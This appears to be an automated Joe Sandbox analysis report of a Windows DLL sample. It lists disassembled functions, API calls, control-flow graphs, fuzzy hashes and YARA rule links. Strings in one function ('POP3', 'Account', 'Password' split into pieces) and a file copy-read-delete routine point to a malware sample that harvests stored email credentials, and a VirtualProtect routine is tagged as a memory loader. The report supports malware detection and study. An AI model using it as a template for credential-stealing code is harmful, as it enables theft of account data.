                                                                                                                                                                                                                                            control_flow_graph 79 1000c7a7-1000c7bc 80 1000c82d 79->80 81 1000c7be-1000c7c6 79->81 83 1000c82f-1000c833 80->83 81->80 82 1000c7c8-1000c7f6 call 1000c7e6 81->82 91 1000c7f8 82->91 92 1000c86c-1000c86e 82->92 85 1000c872 call 1000c877 83->85 86 1000c835-1000c83d GetModuleHandleA 83->86 89 1000c83f-1000c847 86->89 89->89 90 1000c849-1000c84c 89->90 90->83 93 1000c84e-1000c850 90->93 96 1000c7fa-1000c7fe 91->96 97 1000c85b-1000c85e 91->97 94 1000c870 92->94 95 1000c866-1000c86b 92->95 98 1000c852-1000c854 93->98 99 1000c856-1000c85a 93->99 94->90 95->92 102 1000c865 96->102 103 1000c800-1000c80b GetProcAddress 96->103 100 1000c85f-1000c860 GetProcAddress 97->100 98->100 99->97 100->102 102->95 103->80 104 1000c80d-1000c81a VirtualProtect 103->104 105 1000c82c 104->105 106 1000c81c-1000c82a VirtualProtect 104->106 105->80 106->105
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                                                                              • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                                                              • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                                                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                                              • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2099061454-0
                                                                                                                                                                                                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                            • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                                                                                            Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 107 1000c803-1000c80b GetProcAddress 108 1000c82d 107->108 109 1000c80d-1000c81a VirtualProtect 107->109 112 1000c82f-1000c833 108->112 110 1000c82c 109->110 111 1000c81c-1000c82a VirtualProtect 109->111 110->108 111->110 113 1000c872 call 1000c877 112->113 114 1000c835-1000c83d GetModuleHandleA 112->114 116 1000c83f-1000c847 114->116 116->116 117 1000c849-1000c84c 116->117 117->112 118 1000c84e-1000c850 117->118 119 1000c852-1000c854 118->119 120 1000c856-1000c85e 118->120 121 1000c85f-1000c865 GetProcAddress 119->121 120->121 124 1000c866-1000c86e 121->124 126 1000c870 124->126 126->117
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2152742572-0
                                                                                                                                                                                                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                            • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 136 1000173a-100017fe call 1000c030 call 10002c40 * 2 143 10001803 call 10001cca 136->143 144 10001808-1000180c 143->144 145 10001812-10001816 144->145 146 100019ad-100019b1 144->146 145->146 147 1000181c-10001837 call 10001ede 145->147 150 1000183d-10001845 147->150 151 1000199f-100019ac call 10001ee7 * 2 147->151 152 10001982-10001985 150->152 153 1000184b-1000184e 150->153 151->146 155 10001995-10001999 152->155 156 10001987 152->156 153->152 157 10001854-10001881 call 100044b0 * 2 call 10001db7 153->157 155->150 155->151 159 1000198a-1000198d call 10002c40 156->159 170 10001887-1000189f call 100044b0 call 10001db7 157->170 171 1000193d-10001943 157->171 165 10001992 159->165 165->155 170->171 184 100018a5-100018a8 170->184 172 10001945-10001947 171->172 173 1000197e-10001980 171->173 172->173 175 10001949-1000194b 172->175 173->159 177 10001961-1000197c call 100016aa 175->177 178 1000194d-1000194f 175->178 177->165 181 10001951-10001953 178->181 182 10001955-10001957 178->182 181->177 181->182 185 10001959-1000195b 182->185 186 1000195d-1000195f 182->186 188 100018c4-100018dc call 100044b0 call 10001db7 184->188 189 100018aa-100018c2 call 100044b0 call 10001db7 184->189 185->177 185->186 186->173 186->177 188->155 198 100018e2-1000193b call 100016aa call 100015da call 10002c40 * 2 188->198 189->188 189->198 198->155
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                                                                              • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                                                                              • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 10001855
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 10001869
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 1000188B
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 100018AE
                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 100018C8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                                                                            • API String ID: 3296212668-3023110444
                                                                                                                                                                                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                                            • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                                                                                                                            Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _strlen
                                                                                                                                                                                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                                                                            • API String ID: 4218353326-230879103
                                                                                                                                                                                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                            • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                                                                                                                            Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 276 10007cc2-10007cd6 277 10007d44-10007d4c 276->277 278 10007cd8-10007cdd 276->278 280 10007d93-10007dab call 10007e35 277->280 281 10007d4e-10007d51 277->281 278->277 279 10007cdf-10007ce4 278->279 279->277 282 10007ce6-10007ce9 279->282 290 10007dae-10007db5 280->290 281->280 284 10007d53-10007d90 call 1000571e * 4 281->284 282->277 285 10007ceb-10007cf3 282->285 284->280 288 10007cf5-10007cf8 285->288 289 10007d0d-10007d15 285->289 288->289 295 10007cfa-10007d0c call 1000571e call 100090ba 288->295 292 10007d17-10007d1a 289->292 293 10007d2f-10007d43 call 1000571e * 2 289->293 296 10007dd4-10007dd8 290->296 297 10007db7-10007dbb 290->297 292->293 298 10007d1c-10007d2e call 1000571e call 100091b8 292->298 293->277 295->289 300 10007df0-10007dfc 296->300 301 10007dda-10007ddf 296->301 304 10007dd1 297->304 305 10007dbd-10007dc0 297->305 298->293 300->290 311 10007dfe-10007e0b call 1000571e 300->311 308 10007de1-10007de4 301->308 309 10007ded 301->309 304->296 305->304 313 10007dc2-10007dd0 call 1000571e * 2 305->313 308->309 316 10007de6-10007dec call 1000571e 308->316 309->300 313->304 316->309
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                                                                                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007CFB
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D1D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D32
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D3D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D5F
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D72
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D80
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007D8B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007DC3
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007DCA
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007DE7
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10007DFF
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                                                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                                                                                                                                                                            Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                                                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                                                                            Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1454806937-0
                                                                                                                                                                                                                                            • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                                                            • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                                                                                            Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 377 10009492-100094ef GetConsoleCP 378 10009632-10009644 call 10002ada 377->378 379 100094f5-10009511 377->379 381 10009513-1000952a 379->381 382 1000952c-1000953d call 10007c19 379->382 384 10009566-10009575 call 100079e6 381->384 389 10009563-10009565 382->389 390 1000953f-10009542 382->390 384->378 391 1000957b-1000959b WideCharToMultiByte 384->391 389->384 392 10009548-1000955a call 100079e6 390->392 393 10009609-10009628 390->393 391->378 395 100095a1-100095b7 WriteFile 391->395 392->378 399 10009560-10009561 392->399 393->378 397 100095b9-100095ca 395->397 398 1000962a-10009630 GetLastError 395->398 397->378 400 100095cc-100095d0 397->400 398->378 399->391 401 100095d2-100095f0 WriteFile 400->401 402 100095fe-10009601 400->402 401->398 403 100095f2-100095f6 401->403 402->379 404 10009607 402->404 403->378 405 100095f8-100095fb 403->405 404->378 405->402
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 1000954F
                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 1000956A
                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                                                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                                                                                                                                                                                                            Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 10003370-100033b5 call 10003330 call 100037a7 411 10003416-10003419 406->411 412 100033b7-100033c9 406->412 413 10003439-10003442 411->413 414 1000341b-10003428 call 10003790 411->414 412->413 415 100033cb 412->415 418 1000342d-10003436 call 10003330 414->418 417 100033d0-100033e7 415->417 419 100033e9-100033f7 call 10003740 417->419 420 100033fd 417->420 418->413 427 100033f9 419->427 428 1000340d-10003414 419->428 422 10003400-10003405 420->422 422->417 425 10003407-10003409 422->425 425->413 429 1000340b 425->429 430 10003443-1000344c 427->430 431 100033fb 427->431 428->418 429->418 432 10003486-10003496 call 10003774 430->432 433 1000344e-10003455 430->433 431->422 439 10003498-100034a7 call 10003790 432->439 440 100034aa-100034c6 call 10003330 call 10003758 432->440 433->432 434 10003457-10003466 call 1000bbe0 433->434 442 10003483 434->442 443 10003468-10003480 434->443 439->440 442->432 443->442
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000008.00000002.2405245314.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405214666.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000008.00000002.2405245314.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_10000000_graias.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                                                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                                                                            Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
